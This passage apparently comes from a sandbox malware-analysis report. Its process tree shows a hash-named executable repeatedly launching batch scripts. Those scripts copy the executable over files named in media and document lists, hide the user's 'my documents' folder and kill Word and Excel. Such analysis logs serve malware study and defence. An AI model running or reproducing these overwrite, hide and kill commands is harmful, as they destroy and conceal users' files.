  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9E62.tmp\9E62.tmp\9E63.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:9944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:10016

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2824
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7899.tmp\789A.tmp\789B.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8092
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:8536
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:7964
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:8604

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1872
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A19D.tmp\A19D.tmp\A19E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8640

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:768
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7B58.tmp\7B58.tmp\7B59.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8312
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:9132
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:9680

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2260

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2064
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\79A4.tmp\79A4.tmp\79A5.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8012
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:8912
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:9832

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2088
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1A8.tmp\E1A9.tmp\E1AA.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10192

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1540
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\871A.tmp\871B.tmp\871C.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8560

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:568

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2140
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7B38.tmp\7B39.tmp\7B3A.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8384
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:7408
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:10128

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:936

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2208
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8259.tmp\825A.tmp\825B.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8768

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:588

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1876
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\85B3.tmp\85B4.tmp\85B5.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6868

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1512
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\789A.tmp\789A.tmp\789B.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8212

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1044

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1176
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7B57.tmp\7B58.tmp\7B59.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8356
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:8096
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:8696

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3020
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCF8.tmp\DD07.tmp\DD08.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9540

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1312
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7A7D.tmp\7A7E.tmp\7A7F.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8460
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:9712

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1864

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2692
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8298.tmp\8299.tmp\829A.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5796
